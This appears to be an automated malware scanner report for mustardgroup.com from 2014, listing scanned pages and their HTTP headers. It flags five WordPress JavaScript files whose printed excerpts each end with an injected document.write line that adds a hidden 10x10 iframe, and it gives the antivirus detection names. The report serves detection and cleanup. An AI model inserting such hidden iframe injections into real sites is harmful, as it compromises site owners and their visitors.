New scan:

Malware Scanner report for mustardgroup.com

Malicious/Suspicious/Total urls checked
5/0/17
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/10
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://mustardgroup.com/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
clean
http://www.mustardgroup.com/
200 OK
Content-Length: 19400
Content-Type: text/html
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-1.7.min.js?ver=3.4
200 OK
Content-Length: 94157
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cA(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cx(a){if(!cm[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cn||(cn=c.createElement("iframe"),cn.frameBorder=cn.width=cn.height=0),b.appendChild(cn);if(!co||!cn.createElement)co=(cn.contentWindow||cn.contentDocument).document,co.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),co.close();d=c
... 3222 bytes are skipped ...
unction(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bI,"").replace(bN,bY[1]+"document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Bkav
W32.HfsIframe.C8e5

http://www.mustardgroup.com/wp-content/themes/empire/js/jquery-ui.min.js?ver=3.4
200 OK
Content-Length: 202012
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/preloader.js?ver=3.4
200 OK
Content-Length: 2022
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.fancybox-1.3.4.js?ver=3.4
200 OK
Content-Length: 29535
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



;(function($) {
var tmp, loading, overlay, wrap, outer, content, close, title, nav_left, nav_right,

selectedIndex = 0, selectedOpts = {}, selectedArray = [], currentIndex = 0, currentOpts = {}, currentArray = [],

ajaxLoader = null, imgPreloader = new Image(), imgRegExp = /\.(jpg|gif|png|bmp|jpeg)(.*)?$/i, swfRegExp = /[^\.]\.(swf)\s*$/i,

loadingTimer, loadingFrame = 1,

titleHeight = 0, titleStr = '', start_pos, final_pos, busy
... 3706 bytes are skipped ...
true,
enableKeyboardNav : true,

onStart : function(){},
onCancel : function(){},
onComplete : function(){},
onCleanup : function(){},
onClosed : function(){},
onError : function(){}
};

$(document).ready(function() {
$.fancybox.init();
});

})(jQuery);
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-BLP [Trj]
TrendMicro-HouseCall
TROJ_GEN.F47V1112
Kaspersky
HEUR:Trojan.Script.Generic

http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.twitter.js?ver=3.4
200 OK
Content-Length: 3299
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.nivo.slider.js?ver=3.4
200 OK
Content-Length: 25418
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



(function($) {

var NivoSlider = function(element, options){
var settings = $.extend({}, $.fn.nivoSlider.defaults, options);

var vars = {
currentSlide: 0,
currentImage: '',
totalSlides: 0,
randAnim: '',
running: false,
paused: false,
stop: false
};

var slider = $(element); <
... 3544 bytes are skipped ...
lAdvance: false,
captionOpacity: 0.8,
prevText: 'Prev',
nextText: 'Next',
beforeChange: function(){},
afterChange: function(){},
slideshowEnd: function(){},
lastSlide: function(){},
afterLoad: function(){}
};

$.fn._reverse = [].reverse;

})(jQuery);
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic

http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.bgslider.js?ver=3.4
200 OK
Content-Length: 1911
Content-Type: text/javascript
clean
http://www.mustardgroup.com/wp-content/themes/empire/js/jquery.quicksand.js?ver=3.4
200 OK
Content-Length: 14834
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function ($) {
$.fn.quicksand = function (collection, customOptions) {
var options = {
duration: 750,
easing: 'swing',
attribute: 'data-id', adjustHeight: 'auto', useScaling: true, enhancement: function(c) {}, selector: '> *',
dx: 0,
dy: 0
};
$.extend(options, customOptions);

if ($.browser.msi
... 3366 bytes are skipped ...

$dest.remove();
options.enhancement($sourceParent); for (i = 0; i < animationQueue.length; i++) {
animationQueue[i].element.animate(animationQueue[i].animation, options.duration, options.easing, postCallback);
}
});
};
})(jQuery);
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

Avast
JS:Includer-BB [Trj]
Ikarus
Trojan.IframeRef
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
Sophos
Mal/Iframe-AN
GData
JS:Includer-BB

http://www.mustardgroup.com/wp-content/themes/empire/js/farbtastic.js?ver=3.4
200 OK
Content-Length: 7825
Content-Type: text/javascript
clean
http://mustardgroup.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:34 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/test404page.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 13 Aug 2014 01:18:34 GMT
Set-Cookie: PHPSESSID=463734en5t70ubhairhgiesuu5; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php
clean
http://www.mustardgroup.com/test404page.js
404 Not Found
Content-Length: 17450
Content-Type: text/html
clean
http://www.mustardgroup.com/about-us/
200 OK
Content-Length: 19427
Content-Type: text/html
clean
http://www.mustardgroup.com/wp-includes/js/comment-reply.js?ver=3.4
200 OK
Content-Length: 923
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}};
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');

Antivirus reports:

ESET-NOD32
HTML/Iframe.B.Gen

http://www.mustardgroup.com/management/
200 OK
Content-Length: 20132
Content-Type: text/html
clean
http://www.mustardgroup.com/mustard-group/
200 OK
Content-Length: 17932
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mustardgroup.com

Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 13 Aug 2014 01:18:24 GMT
Pragma: no-cache
Location: http://www.mustardgroup.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0p6jscj803vluiu1pjrgrhb3r2; path=/
X-Pingback: http://www.mustardgroup.com/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mustardgroup.com
Referer: http://www.google.com/search?q=mustardgroup.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mustardgroup.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mustardgroup.com/

Result: mustardgroup.com is not infected or malware details are not published yet.